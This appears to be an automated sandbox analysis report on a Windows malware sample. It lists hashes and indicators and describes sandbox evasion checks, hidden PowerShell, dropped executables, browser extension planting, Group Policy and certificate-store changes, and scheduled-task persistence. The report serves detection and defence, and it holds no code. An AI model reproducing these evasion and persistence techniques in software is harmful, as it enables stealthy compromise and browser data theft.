Overview
overview
10Static
static
7233f95c87f...31.exe
windows7-x64
7233f95c87f...31.exe
windows10-2004-x64
72d8ea1230d...aa.exe
windows7-x64
102d8ea1230d...aa.exe
windows10-2004-x64
1034dba85bb2...1a.exe
windows10-2004-x64
7463d0b0903...ea.exe
windows7-x64
1463d0b0903...ea.exe
windows10-2004-x64
14bcf45bde8...39.exe
windows7-x64
104bcf45bde8...39.exe
windows10-2004-x64
105292b8004f...ce.exe
windows7-x64
105292b8004f...ce.exe
windows10-2004-x64
106babc5b52d...53.dll
windows7-x64
36babc5b52d...53.dll
windows10-2004-x64
385b73b7b3c...45.exe
windows7-x64
1085b73b7b3c...45.exe
windows10-2004-x64
108eb41b097a...ff.exe
windows7-x64
108eb41b097a...ff.exe
windows10-2004-x64
8932380926b...ef.exe
windows7-x64
7932380926b...ef.exe
windows10-2004-x64
79d8729b9ca...de.exe
windows7-x64
109d8729b9ca...de.exe
windows10-2004-x64
89e147a3bb2...53.dll
windows7-x64
89e147a3bb2...53.dll
windows10-2004-x64
8bccfdc8e1a...96.exe
windows7-x64
7bccfdc8e1a...96.exe
windows10-2004-x64
7bf5a9bb619...d7.exe
windows7-x64
3bf5a9bb619...d7.exe
windows10-2004-x64
3d0017384df...0a.exe
windows7-x64
3d0017384df...0a.exe
windows10-2004-x64
3d72aa8fe30...89.exe
windows7-x64
3d72aa8fe30...89.exe
windows10-2004-x64
7fa622e0a4d...52.exe
windows7-x64
1Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
05-11-2024 15:23
Behavioral task
behavioral1
Sample
233f95c87f4930fc7608e264cf8be9d4ff0d5f073c411dc986c7aa8ac2055231.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
233f95c87f4930fc7608e264cf8be9d4ff0d5f073c411dc986c7aa8ac2055231.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
2d8ea1230d6d994febd35edec21f298efe7e1a2a6f75d00a691035980f30a5aa.exe
Resource
win7-20241010-en
Behavioral task
behavioral4
Sample
2d8ea1230d6d994febd35edec21f298efe7e1a2a6f75d00a691035980f30a5aa.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
34dba85bb25c6589d0a5befe607e52b82a740402b92dbb5989797a523fb7561a.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral6
Sample
463d0b090396ffa05d579521256e421080a955415554feebe490482551eb08ea.exe
Resource
win7-20241023-en
Behavioral task
behavioral7
Sample
463d0b090396ffa05d579521256e421080a955415554feebe490482551eb08ea.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral8
Sample
4bcf45bde8ef34c0afeea288098cf34da11c2748eead6cf4752db1a4a2e79c39.exe
Resource
win7-20241010-en
Behavioral task
behavioral9
Sample
4bcf45bde8ef34c0afeea288098cf34da11c2748eead6cf4752db1a4a2e79c39.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral10
Sample
5292b8004f9078cfddbb45f7a0a1d0e6c84a958e43e602f43f8af4161983b6ce.exe
Resource
win7-20241023-en
Behavioral task
behavioral11
Sample
5292b8004f9078cfddbb45f7a0a1d0e6c84a958e43e602f43f8af4161983b6ce.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral12
Sample
6babc5b52d59c0b41e526f06b9e751aeef7ad6fc8b9eef5f56f95d4e3cded853.dll
Resource
win7-20240903-en
Behavioral task
behavioral13
Sample
6babc5b52d59c0b41e526f06b9e751aeef7ad6fc8b9eef5f56f95d4e3cded853.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral14
Sample
85b73b7b3c9acc6648beb77ce878ebeea26a2a949bf17c3184f2bd4544d12b45.exe
Resource
win7-20240903-en
Behavioral task
behavioral15
Sample
85b73b7b3c9acc6648beb77ce878ebeea26a2a949bf17c3184f2bd4544d12b45.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral16
Sample
8eb41b097a51665e2a51b7d055260ea06b5224123450a147080de0a0ebcb4fff.exe
Resource
win7-20240903-en
Behavioral task
behavioral17
Sample
8eb41b097a51665e2a51b7d055260ea06b5224123450a147080de0a0ebcb4fff.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral18
Sample
932380926bc6bffcdf0bc446af37d140ce22426f651679e3b7d1c8fea83d14ef.exe
Resource
win7-20240708-en
Behavioral task
behavioral19
Sample
932380926bc6bffcdf0bc446af37d140ce22426f651679e3b7d1c8fea83d14ef.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral20
Sample
9d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde.exe
Resource
win7-20241010-en
Behavioral task
behavioral21
Sample
9d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral22
Sample
9e147a3bb22a10fe3f032dda125b871c7892065a68acd85de372e4622ec2a753.dll
Resource
win7-20240729-en
Behavioral task
behavioral23
Sample
9e147a3bb22a10fe3f032dda125b871c7892065a68acd85de372e4622ec2a753.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral24
Sample
bccfdc8e1ac04a684732b0011d6b512118d3b6fb5a249803cd2e87427a965296.exe
Resource
win7-20240708-en
Behavioral task
behavioral25
Sample
bccfdc8e1ac04a684732b0011d6b512118d3b6fb5a249803cd2e87427a965296.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral26
Sample
bf5a9bb619ac4bdad9a043f41b3980bf442f3965564ce612ced3cb2352311fd7.exe
Resource
win7-20240903-en
Behavioral task
behavioral27
Sample
bf5a9bb619ac4bdad9a043f41b3980bf442f3965564ce612ced3cb2352311fd7.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral28
Sample
d0017384df7b41aba785a35c92082d1460af89204cfae22e6173eaebe16b270a.exe
Resource
win7-20240903-en
Behavioral task
behavioral29
Sample
d0017384df7b41aba785a35c92082d1460af89204cfae22e6173eaebe16b270a.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral30
Sample
d72aa8fe30b132afe13a9be90142550b530d9687aff41954bbd3503115f37489.exe
Resource
win7-20240903-en
Behavioral task
behavioral31
Sample
d72aa8fe30b132afe13a9be90142550b530d9687aff41954bbd3503115f37489.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral32
Sample
fa622e0a4d023232f16015c8af2f464933217ab600d91ccdaf0099db232c8b52.exe
Resource
win7-20240903-en
General
-
Target
8eb41b097a51665e2a51b7d055260ea06b5224123450a147080de0a0ebcb4fff.exe
-
Size
7.3MB
-
MD5
83dbe0cb14f889e38fc0f8889842cf9d
-
SHA1
ded313ca908136000fd9e5f623dcf0974e2b5f30
-
SHA256
8eb41b097a51665e2a51b7d055260ea06b5224123450a147080de0a0ebcb4fff
-
SHA512
ad4bef13d8b816dc81b42e0a2983cedd8c1b66bb15ffff93d908dd8bb78621c2ec690c44dc01bffb3a378159c42c7552ebd27bdb889eb13351a85a26d61fbac6
-
SSDEEP
196608:91O0G+ffRqHIxpuBM9lsB1veokOefmev7+RND:3OL+ffRqoxpAQi0POcmez+LD
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 97 2516 rundll32.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 1228 powershell.EXE 1280 powershell.EXE -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation pMAkVIP.exe -
Executes dropped EXE 4 IoCs
pid Process 1968 Install.exe 264 Install.exe 2456 OQHKJyH.exe 5000 pMAkVIP.exe -
Indirect Command Execution 1 TTPs 2 IoCs
Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.
pid Process 4364 forfiles.exe 1088 forfiles.exe -
Loads dropped DLL 1 IoCs
pid Process 2516 rundll32.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json pMAkVIP.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini pMAkVIP.exe -
Drops file in System32 directory 29 IoCs
description ioc Process File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 pMAkVIP.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini OQHKJyH.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE pMAkVIP.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 pMAkVIP.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol OQHKJyH.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft pMAkVIP.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 pMAkVIP.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 pMAkVIP.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 pMAkVIP.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_CD08734C3F770C014F2620E6CA4CE9C7 pMAkVIP.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 pMAkVIP.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA pMAkVIP.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData pMAkVIP.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1DEB6997DB25CE8EC844B742DDA6F019 pMAkVIP.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol pMAkVIP.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199 pMAkVIP.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199 pMAkVIP.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4FA45AE1010E09657982D8D28B3BD38E_97769FA94627046053C91C794A3C7311 pMAkVIP.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4FA45AE1010E09657982D8D28B3BD38E_97769FA94627046053C91C794A3C7311 pMAkVIP.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1DEB6997DB25CE8EC844B742DDA6F019 pMAkVIP.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA pMAkVIP.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_CD08734C3F770C014F2620E6CA4CE9C7 pMAkVIP.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies pMAkVIP.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache pMAkVIP.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content pMAkVIP.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File created C:\Program Files (x86)\UBqYudvSNocU2\SJapLburQWKvB.dll pMAkVIP.exe File created C:\Program Files (x86)\UBqYudvSNocU2\tzvjHwr.xml pMAkVIP.exe File created C:\Program Files (x86)\ZUXSmeDRU\JpbrWv.dll pMAkVIP.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi pMAkVIP.exe File created C:\Program Files (x86)\ZUXSmeDRU\QESSbhn.xml pMAkVIP.exe File created C:\Program Files (x86)\xonCRuklPFipnPeqKpR\JFEvsKS.dll pMAkVIP.exe File created C:\Program Files (x86)\oXjeNNLqKAotC\QrBaAnP.dll pMAkVIP.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak pMAkVIP.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja pMAkVIP.exe File created C:\Program Files (x86)\oXjeNNLqKAotC\FMrTanm.xml pMAkVIP.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi pMAkVIP.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak pMAkVIP.exe File created C:\Program Files (x86)\xonCRuklPFipnPeqKpR\xpyTzFn.xml pMAkVIP.exe File created C:\Program Files (x86)\RqtPwFqMTiUn\dvwiIoc.dll pMAkVIP.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bKwcWZekAnYWEgmozo.job schtasks.exe File created C:\Windows\Tasks\MFUxwpyluZmBswWip.job schtasks.exe File created C:\Windows\Tasks\SEVCueFJyRflUhU.job schtasks.exe File created C:\Windows\Tasks\NGWtXtGwgKKYsphzV.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Install.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8eb41b097a51665e2a51b7d055260ea06b5224123450a147080de0a0ebcb4fff.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pMAkVIP.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Install.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "4" pMAkVIP.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket pMAkVIP.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ pMAkVIP.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" pMAkVIP.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
